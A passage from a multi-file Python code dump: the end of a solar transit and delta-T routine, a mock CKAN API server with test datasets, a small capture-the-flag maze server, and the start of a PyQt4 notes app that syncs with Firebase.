Hp[i] = Hp[i] - 360.0
#alpha_prime = ttday0_res[1] + (n * (a + b + c * n)) / 2 # this is vect
#delta_prime = ttday0_res[2] + (n * (ap + bp + cp * n)) / 2 # this is vect
#Hp = (vs + lon - alpha_prime) % 360
#Hp[Hp >= 180] = Hp[Hp >= 180] - 360
x1 = sin(radians(lat))
x2 = cos(radians(lat))
h = [0.0]*3
for i in range(3):
h[i] = degrees(asin(x1*sin(radians(delta_prime[i])) + x2 * cos(radians(delta_prime[i])) * cos(radians(Hp[i]))))
T = float((m[0] - Hp[0] / 360.0) * 86400.0)
R = float((m[1] + (h[1] + 0.8333) / (360.0 * cos(radians(delta_prime[1])) *
cos(radians(lat)) *
sin(radians(Hp[1])))) * 86400.0)
S = float((m[2] + (h[2] + 0.8333) / (360.0 * cos(radians(delta_prime[2])) *
cos(radians(lat)) *
sin(radians(Hp[2])))) * 86400.0)
if add_a_day:
S += 86400.0
if sub_a_day:
R -= 86400.0
transit = T + utday
sunrise = R + utday
sunset = S + utday
return transit, sunrise, sunset
def calculate_deltat(year, month):
y = year + (month - 0.5)/12
if (2005 <= year) & (year < 2050):
t1 = (y-2000.0)
deltat = (62.92+0.32217*t1 + 0.005589*t1*t1)
elif (1986 <= year) & (year < 2005):
t1 = y - 2000.0
deltat = (63.86+0.3345*t1
- 0.060374*t1**2
+ 0.0017275*t1**3
+ 0.000651814*t1**4
+ 0.00002373599*t1**5)
elif (2050 <= year) & (year < 2150):
deltat = (-20+32*((y-1820)/100)**2
- 0.5628*(2150-y))
elif year < -500.0:
deltat = -20.0 + 32*(0.01*(y-1820.0))**2
elif (-500 <= year) & (year < 500):
t1 = y/100
deltat = (10583.6-1014.41*(y/100)
+ 33.78311*(y/100)**2
- 5.952053*(y/100)**3
- 0.1798452*(y/100)**4
+ 0.022174192*(y/100)**5
+ 0.0090316521*(y/100)**6)
elif (500 <= year) & (year < 1600):
t1 = (y-1000)/100
deltat = (1574.2-556.01*((y-1000)/100)
+ 71.23472*((y-1000)/100)**2
+ 0.319781*((y-1000)/100)**3
- 0.8503463*((y-1000)/100)**4
- 0.005050998*((y-1000)/100)**5
+ 0.0083572073*((y-1000)/100)**6)
elif (1600 <= year) & (year < 1700):
t1 = (y-1600.0)
deltat = (120-0.9808*(y-1600)
- 0.01532*(y-1600)**2
+ (y-1600)**3/7129)
elif (1700 <= year) & (year < 1800):
t1 = (y - 1700.0)
deltat = (8.83+0.1603*(y-1700)
- 0.0059285*(y-1700)**2
+ 0.00013336*(y-1700)**3
- (y-1700)**4/1174000)
elif (1800 <= year) & (year < 1860):
t1 = y - 1800.0
deltat = (13.72-0.332447*(y-1800)
+ 0.0068612*(y-1800)**2
+ 0.0041116*(y-1800)**3
- 0.00037436*(y-1800)**4
+ 0.0000121272*(y-1800)**5
- 0.0000001699*(y-1800)**6
+ 0.000000000875*(y-1800)**7)
elif (1860 <= year) & (year < 1900):
t1 = y-1860.0
deltat = (7.62+0.5737*(y-1860)
- 0.251754*(y-1860)**2
+ 0.01680668*(y-1860)**3
- 0.0004473624*(y-1860)**4
+ (y-1860)**5/233174)
elif (1900 <= year) & (year < 1920):
t1 = y - 1900.0
deltat = (-2.79+1.494119*(y-1900)
- 0.0598939*(y-1900)**2
+ 0.0061966*(y-1900)**3
- 0.000197*(y-1900)**4)
elif (1920 <= year) & (year < 1941):
t1 = y - 1920.0
deltat = (21.20+0.84493*(y-1920)
- 0.076100*(y-1920)**2
+ 0.0020936*(y-1920)**3)
elif (1941 <= year) & (year < 1961):
t1 = y - 1950.0
deltat = (29.07+0.407*(y-1950)
- (y-1950)**2/233
+ (y-1950)**3/2547)
elif (1961 <= year) & (year < 1986):
t1 = y-1975
deltat = (45.45+1.067*(y-1975)
- (y-1975)**2/260
- (y-1975)**3/718)
elif year >= 2150:
deltat = -20+32*((y-1820)/100)**2
return deltat
|
mock_ckan.py
|
from __future__ import print_function
import json
import re
import copy
import urllib
import SimpleHTTPServer
import SocketServer
from threading import Thread
PORT = 8998
class MockCkanHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
# test name is the first bit of the URL and makes CKAN behave
# differently in some way.
# Its value is recorded and then removed from the path
self.test_name = None
test_name_match = re.match('^/([^/]+)/', self.path)
if test_name_match:
self.test_name = test_name_match.groups()[0]
if self.test_name == 'api':
self.test_name = None
else:
self.path = re.sub('^/([^/]+)/', '/', self.path)
if self.test_name == 'site_down':
return self.respond('Site is down', status=500)
# The API version is recorded and then removed from the path
api_version = None
version_match = re.match('^/api/(\d)', self.path)
if version_match:
api_version = int(version_match.groups()[0])
self.path = re.sub('^/api/(\d)/', '/api/', self.path)
if self.path == '/api/rest/package':
if api_version == 2:
dataset_refs = [d['id'] for d in DATASETS]
else:
dataset_refs = [d['name'] for d in DATASETS]
return self.respond_json(dataset_refs)
if self.path == '/api/action/package_list':
dataset_names = [d['name'] for d in DATASETS]
return self.respond_action(dataset_names)
if self.path.startswith('/api/rest/package/'):
dataset_ref = self.path.split('/')[-1]
dataset = self.get_dataset(dataset_ref)
if dataset:
return self.respond_json(
convert_dataset_to_restful_form(dataset))
if self.path.startswith('/api/action/package_show'):
params = self.get_url_params()
dataset_ref = params['id']
dataset = self.get_dataset(dataset_ref)
if dataset:
return self.respond_action(dataset)
if self.path.startswith('/api/action/group_show'):
params = self.get_url_params()
group_ref = params['id']
group = self.get_group(group_ref)
if group:
return self.respond_action(group)
if self.path.startswith('/api/search/dataset'):
params = self.get_url_params()
if params.keys() == ['organization']:
org = self.get_org(params['organization'])
dataset_ids = [d['id'] for d in DATASETS
if d['owner_org'] == org['id']]
return self.respond_json({'count': len(dataset_ids),
'results': dataset_ids})
else:
return self.respond(
'Not implemented search params %s' % params, status=400)
if self.path.startswith('/api/search/revision'):
revision_ids = [r['id'] for r in REVISIONS]
return self.respond_json(revision_ids)
if self.path.startswith('/api/rest/revision/'):
revision_ref = self.path.split('/')[-1]
assert api_version == 2
for rev in REVISIONS:
if rev['id'] == revision_ref:
return self.respond_json(rev)
self.respond('Cannot find revision', status=404)
# /api/3/action/package_search?fq=metadata_modified:[2015-10-23T14:51:13.282361Z TO *]&rows=1000
if self.path.startswith('/api/action/package_search'):
params = self.get_url_params()
if self.test_name == 'datasets_added':
if params['start'] == '0':
# when page 1 is retrieved, the site only has 1 dataset
datasets = [DATASETS[0]['name']]
elif params['start'] == '100':
# when page 2 is retrieved, the site now has new datasets,
# and so the second page has the original dataset, pushed
# onto this page now, plus a new one
datasets = [DATASETS[0]['name'],
DATASETS[1]['name']]
else:
datasets = []
else:
# ignore sort param for now
if 'sort' in params:
del params['sort']
if params['start'] != '0':
datasets = []
elif set(params.keys()) == set(['rows', 'start']):
datasets = ['dataset1', DATASETS[1]['name']]
elif set(params.keys()) == set(['fq', 'rows', 'start']) and \
params['fq'] == '-organization:org1':
datasets = [DATASETS[1]['name']]
elif set(params.keys()) == set(['fq', 'rows', 'start']) and \
params['fq'] == 'organization:org1':
datasets = ['dataset1']
elif set(params.keys()) == set(['fq', 'rows', 'start']) and \
params['fq'] == '-groups:group1':
datasets = [DATASETS[1]['name']]
elif set(params.keys()) == set(['fq', 'rows', 'start']) and \
params['fq'] == 'groups:group1':
datasets = ['dataset1']
elif set(params.keys()) == set(['fq', 'rows', 'start']) and \
'metadata_modified' in params['fq']:
assert '+TO+' not in params['fq'], \
'Spaces should not be decoded by now - seeing + '\
'means they were double encoded and SOLR doesnt like '\
'that'
datasets = [DATASETS[1]['name']]
else:
return self.respond(
'Not implemented search params %s' % params,
status=400)
out = {'count': len(datasets),
'results': [self.get_dataset(dataset_ref_)
for dataset_ref_ in datasets]}
return self.respond_action(out)
# if we wanted to server a file from disk, then we'd call this:
#return SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
self.respond('Mock CKAN doesnt recognize that call', status=400)
def get_dataset(self, dataset_ref):
for dataset in DATASETS:
if dataset['name'] == dataset_ref or \
dataset['id'] == dataset_ref:
if self.test_name == 'invalid_tag':
dataset['tags'] = INVALID_TAGS
return dataset
def get_group(self, group_ref):
for group in GROUPS:
if group['name'] == group_ref or \
group['id'] == group_ref:
return group
def get_org(self, org_ref):
for org in ORGS:
if org['name'] == org_ref or \
org['id'] == org_ref:
return org
def get_url_params(self):
params_str = self.path.split('?')[-1]
params_unicode = urllib.unquote_plus(params_str).decode('utf8')
params = params_unicode.split('&')
return dict([param.split('=') for param in params])
def respond_action(self, result_dict, status=200):
response_dict = {'result': result_dict, 'success': True}
return self.respond_json(response_dict, status=status)
def respond_json(self, content_dict, status=200):
return self.respond(json.dumps(content_dict), status=status,
content_type='application/json')
def respond(self, content, status=200, content_type='application/json'):
self.send_response(status)
self.send_header('Content-Type', content_type)
self.end_headers()
self.wfile.write(content)
self.wfile.close()
def serve(port=PORT):
'''Runs a CKAN-alike app (over HTTP) that is used for harvesting tests'''
# Choose the directory to serve files from
#os.chdir(os.path.join(os.path.dirname(os.path.abspath(__file__)),
# 'mock_ckan_files'))
class TestServer(SocketServer.TCPServer):
allow_reuse_address = True
httpd = TestServer(("", PORT), MockCkanHandler)
print('Serving test HTTP server at port {}'.format(PORT))
httpd_thread = Thread(target=httpd.serve_forever)
httpd_thread.setDaemon(True)
httpd_thread.start()
def convert_dataset_to_restful_form(dataset):
dataset = copy.deepcopy(dataset)
dataset['extras'] = dict([(e['key'], e['value']) for e in dataset['extras']])
dataset['tags'] = [t['name'] for t in dataset.get('tags', [])]
return dataset
# Datasets are in the package_show form, rather than the RESTful form
DATASETS = [
{'id': 'dataset1-id',
'name': 'dataset1',
'title': 'Test Dataset1',
'owner_org': 'org1-id',
'tags': [{'name': 'test-tag'}],
'groups': [{'id': 'group1-id', 'name': 'group1'}],
'extras': []},
{
"id": "1c65c66a-fdec-4138-9c64-0f9bf087bcbb",
"name": "cabinet-office-energy-use",
"private": False,
"maintainer_email": None,
"revision_timestamp": "2010-11-23T22:34:55.089925",
"organization":
{
"description": "The Cabinet Office supports the Prime Minister and Deputy Prime Minister, and ensure the effective running of government. We are also the corporate headquarters for government, in partnership with HM Treasury, and we take the lead in certain critical policy areas.\r\nCO is a ministerial department, supported by 18 agencies and public bodies\r\n\r\nYou can find out more at https://www.gov.uk/government/organisations/cabinet-office",
"created": "2012-06-27T14:48:40.244951",
"title": "Cabinet Office",
"name": "cabinet-office",
"revision_timestamp": "2013-04-02T14:27:23.086886",
"is_organization": True,
"state": "active",
"image_url": "",
"revision_id": "4be8825d-d3f4-4fb2-b80b-43e36f574c05",
"type": "organization",
"id": "aa1e068a-23da-4563-b9c2-2cad272b663e",
"approval_status": "pending"
},
"update_frequency": "other",
"metadata_created": "2010-08-02T09:19:47.600853",
"last_major_modification": "2010-08-02T09:19:47.600853",
"metadata_modified": "2014-05-09T22:00:01.486366",
"temporal_granularity": "",
"author_email": None,
"geographic_granularity": "point",
"geographic_coverage": [ ],
"state": "active",
"version": None,
"temporal_coverage-to": "",
"license_id": "uk-ogl",
"type": "dataset",
"published_via": "",
"resources":
[
{
"content_length": "69837",
"cache_url": "http://data.gov.uk/data/resource_cache/f1/f156019d-ea88-46a6-8fa3-3d12582e2161/elec00.csv",
"hash": "6f1e452320dafbe9a5304ac77ed7a4ff79bfafc3",
"description": "70 Whitehall energy data",
"cache_last_updated": "2013-06-19T00:59:42.762642",
"url": "http://data.carbonculture.net/orgs/cabinet-office/70-whitehall/reports/elec00.csv",
"openness_score_failure_count": "0",
"format": "CSV",
"cache_filepath": "/mnt/shared/ckan_resource_cache/f1/f156019d-ea88-46a6-8fa3-3d12582e2161/elec00.csv",
"tracking_summary":
{
"total": 0,
"recent": 0
},
"last_modified": "2014-05-09T23:00:01.435211",
"mimetype": "text/csv",
"content_type": "text/csv",
"openness_score": "3",
"openness_score_reason": "open and standardized format",
"position": 0,
"revision_id": "4fca759e-d340-4e64-b75e-22ee1d42c2b4",
"id": "f156019d-ea88-46a6-8fa3-3d12582e2161",
"size": 299107
}
],
"num_resources": 1,
"tags":
[
{
"vocabulary_id": None,
"display_name": "consumption",
"name": "consumption",
"revision_timestamp": "2010-08-02T09:19:47.600853",
"state": "active",
"id": "84ce26de-6711-4e85-9609-f7d8a87b0fc8"
},
{
"vocabulary_id": None,
"display_name": "energy",
"name": "energy",
"revision_timestamp": "2010-08-02T09:19:47.600853",
"state": "active",
"id": "9f2ae723-602f-4290-80c4-6637ad617a45"
}
],
"precision": "",
"tracking_summary":
{
"total": 0,
"recent": 0
},
"taxonomy_url": "",
"groups": [{"id": "remote-group-id", "name": "remote-group"}],
"groups": [],
"creator_user_id": None,
"national_statistic": "no",
"relationships_as_subject": [],
"num_tags": 8,
"update_frequency-other": "Real-time",
"isopen": True,
"url": "http://www.carbonculture.net/orgs/cabinet-office/70-whitehall/",
"notes": "Cabinet Office head office energy use updated from on-site meters showing use, cost and carbon impact.",
"owner_org": "aa1e068a-23da-4563-b9c2-2cad272b663e",
"theme-secondary":
[
"Environment"
],
"extras":
[
{
"package_id": "1c65c66a-fdec-4138-9c64-0f9bf087bcbb",
"value": "",
"revision_timestamp": "2010-08-02T09:19:47.600853",
"state": "active",
"key": "categories",
"revision_id": "08bac459-1d44-44fb-b388-20f4d8394364",
"id": "6813d71b-785b-4f56-b296-1b2acb34eed6"
},
{
"package_id": "1c65c66a-fdec-4138-9c64-0f9bf087bcbb",
"value": "2010-07-30",
"revision_timestamp": "2010-08-02T09:19:47.600853",
"state": "active",
"key": "date_released",
"revision_id": "08bac459-1d44-44fb-b388-20f4d8394364",
"id": "515f638b-e2cf-40a6-a8a7-cbc8001269e3"
},
{
"package_id": "1c65c66a-fdec-4138-9c64-0f9bf087bcbb",
"value": "",
"revision_timestamp": "2010-08-02T09:19:47.600853",
"state": "active",
"key": "date_updated",
"revision_id": "08bac459-1d44-44fb-b388-20f4d8394364",
"id": "bff63465-4f96-44e7-bb87-6e66fff5e596"
},
{
"package_id": "1c65c66a-fdec-4138-9c64-0f9bf087bcbb",
"value": "000000: ",
"revision_timestamp": "2010-08-02T09:19:47.600853",
"state": "active",
"key": "geographic_coverage",
"revision_id": "08bac459-1d44-44fb-b388-20f4d8394364",
"id": "414bcd35-b628-4218-99e2-639615183df8"
},
{
"package_id": "1c65c66a-fdec-4138-9c64-0f9bf087bcbb",
"value": "point",
"revision_timestamp": "2010-08-02T09:19:47.600853",
"state": "active",
"key": "geographic_granularity",
"revision_id": "08bac459-1d44-44fb-b388-20f4d8394364",
"id": "c7b460dd-c61f-4cd2-90c2-eceb6c91fe9b"
},
{
"package_id": "1c65c66a-fdec-4138-9c64-0f9bf087bcbb",
"value": "no",
"revision_timestamp": "2010-08-02T09:19:47.600853",
"state": "active",
"key": "national_statistic",
"revision_id": "08bac459-1d44-44fb-b388-20f4d8394364",
"id": "9f04b202-3646-49be-b69e-7fa997399ff3"
},
{
"package_id": "1c65c66a-fdec-4138-9c64-0f9bf087bcbb",
"value": "{\"status\": \"final\", \"source\": \"Automatically awarded by ODI\", \"certification_type\": \"automatically awarded\", \"level\": \"raw\", \"title\": \"Cabinet Office 70 Whitehall energy use\", \"created_at\": \"2014-10-28T12:25:57Z\", \"jurisdiction\": \"GB\", \"certificate_url\": \"https://certificates.theodi.org/datasets/5480/certificates/17922\", \"badge_url\": \"https://certificates.theodi.org/datasets/5480/certificates/17922/badge.png\", \"cert_title\": \"Basic Level Certificate\"}",
"revision_timestamp": "2014-11-12T02:52:35.048060",
"state": "active",
"key": "odi-certificate",
"revision_id": "eae9763b-e258-4d76-9ec2-7f5baf655394",
"id": "373a3cbb-d9c0-45a6-9a78-b95c86398766"
},
{
"package_id": "1c65c66a-fdec-4138-9c64-0f9bf087bcbb",
"value": "",
"revision_timestamp": "2010-08-02T09:19:47.600853",
"state": "active",
"key": "temporal_coverage-from",
"revision_id": "08bac459-1d44-44fb-b388-20f4d8394364",
"id": "39f72eed-6f76-4733-b636-7541cee3404f"
},
{
"package_id": "1c65c66a-fdec-4138-9c64-0f9bf087bcbb",
"value": "",
"revision_timestamp": "2010-08-02T09:19:47.600853",
"state": "active",
"key": "temporal_coverage-to",
"revision_id": "08bac459-1d44-44fb-b388-20f4d8394364",
"id": "818e2c8f-fee0-49da-8bea-ea3c9401ece5"
},
{
"package_id": "1c65c66a-fdec-4138-9c64-0f9bf087bcbb",
"value": "",
"revision_timestamp": "2010-08-02T09:19:47.600853",
"state": "active",
"key": "temporal_granularity",
"revision_id": "08bac459-1d44-44fb-b388-20f4d8394364",
"id": "f868b950-d3ce-4fbe-88ca-5cbc4b672320"
},
{
"package_id": "1c65c66a-fdec-4138-9c64-0f9bf087bcbb",
"value": "Towns & Cities",
"revision_timestamp": "2015-03-16T18:10:08.802815",
"state": "active",
"key": "theme-primary",
"revision_id": "fc2b6630-84f8-4c88-8ac7-0ca275b2bc97",
"id": "bdcf00fd-3248-4c2f-9cf8-b90706c88e8d"
},
{
"package_id": "1c65c66a-fdec-4138-9c64-0f9bf087bcbb",
"value": "[\"Environment\"]",
"revision_timestamp": "2015-04-08T20:57:04.895214",
"state": "active",
"key": "theme-secondary",
"revision_id": "c2c48530-ff82-4af1-9373-cdc64d5bc83c",
"id": "417482c5-a9c0-4430-8c4e-0c76e59fe44f"
},
{
"package_id": "1c65c66a-fdec-4138-9c64-0f9bf087bcbb",
"value": "Real-time",
"revision_timestamp": "2010-08-02T09:19:47.600853",
"state": "active",
"key": "update_frequency",
"revision_id": "08bac459-1d44-44fb-b388-20f4d8394364",
"id": "e8ad4837-514e-4446-81a2-ffacfa7cf683"
}
],
"license_url": "http://www.nationalarchives.gov.uk/doc/open-government-licence/version/3/",
"individual_resources":
[
{
"content_length": "69837",
"cache_url": "http://data.gov.uk/data/resource_cache/f1/f156019d-ea88-46a6-8fa3-3d12582e2161/elec00.csv",
"hash": "6f1e452320dafbe9a5304ac77ed7a4ff79bfafc3",
"description": "70 Whitehall energy data",
"cache_last_updated": "2013-06-19T00:59:42.762642",
"url": "http://data.carbonculture.net/orgs/cabinet-office/70-whitehall/reports/elec00.csv",
"openness_score_failure_count": "0",
"format": "CSV",
"cache_filepath": "/mnt/shared/ckan_resource_cache/f1/f156019d-ea88-46a6-8fa3-3d12582e2161/elec00.csv",
"tracking_summary":
{
"total": 0,
"recent": 0
},
"last_modified": "2014-05-09T23:00:01.435211",
"mimetype": "text/csv",
"content_type": "text/csv",
"openness_score": "3",
"openness_score_reason": "open and standardized format",
"position": 0,
"revision_id": "4fca759e-d340-4e64-b75e-22ee1d42c2b4",
"id": "f156019d-ea88-46a6-8fa3-3d12582e2161",
"size": 299107
}
],
"title": "Cabinet Office 70 Whitehall energy use",
"revision_id": "3bd6ced3-35b2-4b20-94e2-c596e24bc375",
"date_released": "30/7/2010",
"theme-primary": "Towns & Cities"
}
]
INVALID_TAGS = [
{
"vocabulary_id": None,
"display_name": "consumption%^&",
"name": "consumption%^&",
"revision_timestamp": "2010-08-02T09:19:47.600853",
"state": "active",
"id": "84ce26de-6711-4e85-9609-f7d8a87b0fc8"
},
]
ORGS = [
{'id': 'org1-id',
'name': 'org1'},
{'id': 'aa1e068a-23da-4563-b9c2-2cad272b663e',
'name': 'cabinet-office'}
]
GROUPS = [
{'id': 'group1-id',
'name': 'group1'},
{'id': '9853c3e1-eebb-4e8c-9ae7-1668a01bf2ca',
'name': 'finances'}
]
REVISIONS = [
{
"id": "23daf2eb-d7ec-4d86-a844-3924acd311ea",
"timestamp": "2015-10-21T09:50:08.160045",
"message": "REST API: Update object dataset1",
"author": "ross",
"approved_timestamp": None,
"packages":
[
DATASETS[1]['id']
],
"groups": [ ]
},
{
"id": "8254a293-10db-4af2-9dfa-6a1f06ee899c",
"timestamp": "2015-10-21T09:46:21.198021",
"message": "REST API: Update object dataset1",
"author": "ross",
"approved_timestamp": None,
"packages":
[
DATASETS[1]['id']
],
"groups": [ ]
}]
|
server.py
|
#!/usr/bin/env python3
from __future__ import annotations
from maze import RandomMaze
import os, socketserver, threading
import solver
HOST, PORT = "0.0.0.0", int(os.environ.get("PORT", 24001))
flag = open('flag', 'r').readline()
'''
Main componnent, presents the maze to the user and
verify its answer
'''
class ThreadedTCPRequestHandler(socketserver.StreamRequestHandler):
def handle(self):
m = RandomMaze(89, 51)
self.wfile.write(b"You have 2 seconds to send back a valid path between S and E\n")
self.wfile.write(b"(ex: RIGHT,RIGHT,RIGHT,DOWN,RIGHT,RIGHT,UP,UP,UP,UP,UP,LEFT)\n")
self.wfile.write(f"{m}\n\n".encode())
self.data = self.rfile.readline().strip()
print(f"{self.client_address[0]} wrote: {self.data.decode()}")
result = solver.follow_path(m, self.data.decode())
if result is not None and result.val == "E":
print("Success!")
self.wfile.write(f"{flag}\n".encode())
else:
print("Failure!")
self.wfile.write(b"Wrong path; Try harder\n")
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
if __name__ == "__main__":
server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
print("Server loop running in thread:", server_thread.name)
|
MainWindow.py
|
from PyQt4.QtGui import *
from PyQt4.QtCore import *
import Configuration as cfg
import datetime, calendar, threading, time, uuid
import ExcelDBOps as dbop
import FirebaseConn as fb
class MainWindowApplication(QMainWindow):
def __init__(self):
super(MainWindowApplication, self).__init__()
self.setUpDBDaemon()
self.initUi()
self.currentWorkingDate = ''
def setUpDBDaemon(self):
self.thread_stop_flag = True
self.t = threading.Thread(target=self.setUpDBDaemonLooper, args=())
self.t.daemon = True
self.t.start()
def setUpDBDaemonLooper(self):
while self.thread_stop_flag:
# try:
self.R()
time.sleep(5)
# except:
# print("Error in daemon.")
def R(self):
try:
nFB_res_data = fb.getAllDataCount()
except:
return
nDB = dbop.getAllDataCount()
if nDB == 0 and len(nFB_res_data.keys()) > 0:
dbop.justInsert(nFB_res_data)
self.fillDataIntoTable()
elif nDB > 0 and nFB_res_data is None:
res = dbop.getAllData()
for k in res.keys():
data = {
"note": str(res[k][0]),
"datestamp": str(res[k][1]),
"hashval": str(res[k][2]),
"lastchanged": str(res[k][3])
}
try:
newId = fb.insertData(data)
except:
return
dbop.updateNoteID(str(k), str(newId['name']))
self.fillDataIntoTable()
else:
resFb = nFB_res_data
resDb = dbop.getAllData()
# Local Deleted Elements
for k in resDb:
if resDb[k][2] == 'delete':
try:
fb.deleteNote(str(k), "")
except:
continue
dbop.finalDelete(k)
# Check if the matching ID's hash is same and then if the local lastChanged > firebase lastChanged
for k in resDb:
try:
h = (resFb[k]['hashval'])
except:
data = {
"note": str(resDb[k][0]),
"datestamp": str(resDb[k][1]),
"hashval": str(resDb[k][2]),
"lastchanged": str(resDb[k][3])
}
try:
newId = fb.insertData(data)
except:
return
dbop.updateNoteID(str(k), str(newId['name']))
for k in resDb:
if str(resDb[k][2]) != str(resFb[k]['hashval']):
localTimeTMP = resDb[k][3]
if localTimeTMP.__contains__("."):
localTimeTMP = localTimeTMP[:localTimeTMP.index('.')]
orginTimeTMP = resFb[k]['lastchanged']
if orginTimeTMP.__contains__("."):
orginTimeTMP = orginTimeTMP[:orginTimeTMP.index('.')]
if localTimeTMP > orginTimeTMP:
# print("Local id better...")
fb.editNode(
str(k),
str(resDb[k][1]),
str(resDb[k][2]),
str(resDb[k][3])
)
elif localTimeTMP < orginTimeTMP:
# print("FB id better...")
dbop.updateDataAsPerId(
str(k),
resFb[k]['note'],
resFb[k]['lastchanged']
)
else:
pass
# print("Both OK")
self.fillDataIntoTable()
def initUi(self):
self.setWindowTitle(cfg.APPLICATION_TITLE)
self.setMinimumSize(800, 650)
self.setWindowIcon(QIcon('./src/icon_notes.png'))
# self.setWindowFlags(Qt.FramelessWindowHint)
self.gLayout = QVBoxLayout()
# set Header UI
self.uiHeader()
self.uiTableBody()
self.uiBottom()
# sub layouts
# Sub layout Prop
# Widgets
# Widget Props
# Add to sub layout
# Add to main layout
# setting central widget
mainVLayoutWidget = QWidget()
mainVLayoutWidget.setLayout(self.gLayout)
self.setCentralWidget(mainVLayoutWidget)
self.showMaximized()
self.show()
def uiHeader(self):
self.hlayoutHeader = QGridLayout()
# sub layouts
# Sub layout Prop
# Widgets
self.labelDayOfWeekAndDate = QLabel()
self.labelMonth = QLabel()
self.labelNoOfTasks = QLabel()
self.btnDateSelecter = QLabel("<html><img src='./src/icon_down_arrow.png' width='32' height='32'></html>")
# Widget Props
self.labelDayOfWeekAndDate.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.labelDayOfWeekAndDate.setStyleSheet("font-size: 30px;")
self.labelMonth.setStyleSheet("font-size: 15px;")
self.labelNoOfTasks.setAlignment(Qt.AlignRight)
self.btnDateSelecter.setAlignment(Qt.AlignLeft)
self.btnDateSelecter.setToolTip("Date picker")
# Add to sub layout
# Add to main layout
self.hlayoutHeader.addWidget(self.labelDayOfWeekAndDate, 0, 0)
self.hlayoutHeader.addWidget(self.labelMonth, 1, 0)
self.hlayoutHeader.addWidget(self.btnDateSelecter, 0, 1)
self.hlayoutHeader.addWidget(self.labelNoOfTasks, 0, 2, 2, 1)
# Listener
self.btnDateSelecter.mousePressEvent = self.clickSelectDate
# Initialize Texts
today = datetime.date.today()
self.currentWorkingDate = today
noOfTasks = 0
self.setHeaderLabelValues(today, noOfTasks)
# default values
self.gLayout.addLayout(self.hlayoutHeader)
def setHeaderLabelValues(self, today, noOfTasks):
self.labelDayOfWeekAndDate.setText(calendar.day_name[today.weekday()] + ", " + str(today.day))
self.labelMonth.setText(str(calendar.month_name[today.month]) + ", " + str(today.year))
self.labelNoOfTasks.setText(str(noOfTasks) + " Notes")
def clickSelectDate(self, e):
self.selectDateDialog = QDialog()
self.vbox = QVBoxLayout()
self.calenderWidget = QCalendarWidget()
self.btnDone = QPushButton("Done")
self.calenderWidget.setGridVisible(True)
self.vbox.addWidget(self.calenderWidget)
self.vbox.addWidget(self.btnDone)
self.selectDateDialog.setLayout(self.vbox)
self.btnDone.clicked.connect(self.loadDate)
self.selectDateDialog.exec_()
def loadDate(self):
ca = self.calenderWidget.selectedDate()
y = ca.year()
m = ca.month()
d = ca.day()
self.selectDateDialog.close()
self.setHeaderLabelValues(datetime.date(y, m, d), 0)
self.fillDataIntoTable()
def uiTableBody(self):
# sub layouts
# Sub layout Prop
# Widgets
self.table = QTableWidget()
self.table.setColumnCount(4)
self.table.setHorizontalHeaderLabels(["Id", "Date", "Time", "Note"])
self.table.horizontalHeader().setStretchLastSection(True)
self.table.verticalHeader().setVisible(False)
self.table.setEditTriggers(QAbstractItemView.NoEditTriggers)
self.table.setSelectionBehavior(QAbstractItemView.SelectRows)
self.table.setRowHeight(100, 100)
# Widget Props
# Add to sub layout
# Add to main layout
self.gLayout.addWidget(self.table)
# Listener
# Initialize Texts
# default values
self.fillDataIntoTable()
def fillDataIntoTable(self):
d = str(self.labelDayOfWeekAndDate.text()).split(" ")[1]
tmp = str(self.labelMonth.text()).split(", ")
y = tmp[1]
m = datetime.datetime.strptime(tmp[0], "%B")
m = m.month
if len(str(m)) == 1:
m = "0" + str(m)
if len(str(d)) == 1:
d = "0" + str(d)
tmpDate = y + '-' + m + '-' + d
data = dbop.getDataAsPerDate(str(tmpDate))
n = len(data.keys())
self.table.clearContents()
self.labelNoOfTasks.setText(str(n) + " Tasks")
self.table.setRowCount(n)
cnt = 0
for k in data.keys():
hashVal = data[k][2]
if hashVal != 'delete':
timeStampTmp = data[k][1].split(" ")
self.table.setItem(cnt, 0, QTableWidgetItem(k))
self.table.setItem(cnt, 1, QTableWidgetItem(timeStampTmp[0]))
self.table.setItem(cnt, 2, QTableWidgetItem(timeStampTmp[1]))
self.table.setItem(cnt, 3, QTableWidgetItem(data[k][0]))
cnt += 1
def uiBottom(self):
# sub layouts
self.hboxLayoutButtons = QHBoxLayout()
# Sub layout Prop
self.hboxLayoutButtons.setAlignment(Qt.AlignRight)
# Widgets
self.btnAddNote = QLabel("<html><img src='./src/icon_add.png' width='32' height='32'></html>")
self.btnEditNote = QLabel("<html><img src='./src/icon_edit.png' width='32' height='32'></html>")
self.btnDeleteNote = QLabel("<html><img src='./src/icon_delete.png' width='32' height='32'></html>")
# Widget Props
self.btnAddNote.setToolTip("Add New Note...")
self.btnEditNote.setToolTip("Edit Note...")
self.btnDeleteNote.setToolTip("Delete Note...")
# Add to sub layout
self.hboxLayoutButtons.addWidget(self.btnAddNote)
self.hboxLayoutButtons.addWidget(self.btnEditNote)
self.hboxLayoutButtons.addWidget(self.btnDeleteNote)
# Add to main layout
self.gLayout.addLayout(self.hboxLayoutButtons)
# Listener
self.btnAddNote.mousePressEvent = self.clickAddNewNote
self.btnEditNote.mousePressEvent = self.clickEditNote
self.btnDeleteNote.mousePressEvent = self.clickDeleteNote
# Initialize Texts
# default values
def clickAddNewNote(self, e):
d = str(self.labelDayOfWeekAndDate.text()).split(" ")[1]
tmp = str(self.labelMonth.text()).split(", ")
y = tmp[1]
m = datetime.datetime.strptime(tmp[0], "%B")
m = m.month
if len(str(m)) == 1:
m = "0" + str(m)
if len(str(d)) == 1:
d = "0" + str(d)
if datetime.date(int(y), int(m), int(d)) < datetime.date.today():
msg = QMessageBox()
msg.setWindowTitle("Error")
msg.setIcon(QMessageBox.Critical)
msg.setText("You cannot add new item to older dates.")
msg.exec_()
return
else:
self.addNoteDialog = QDialog()
self.addNoteDialog.setWindowTitle("+Add Note")
self.addNoteDialog.setWindowIcon(QIcon("./src/icon_notes.png"))
self.addNoteDialog.setFixedSize(500, 300)
self.editText = QTextEdit()
self.btnSave = QPushButton("Save")
self.btnCancel = QPushButton("Cancel")
grid = QGridLayout()
grid.addWidget(QLabel("Note"), 0, 0)
grid.addWidget(self.editText, 1, 0, 1, 3)
grid.addWidget(self.btnSave, 2, 1)
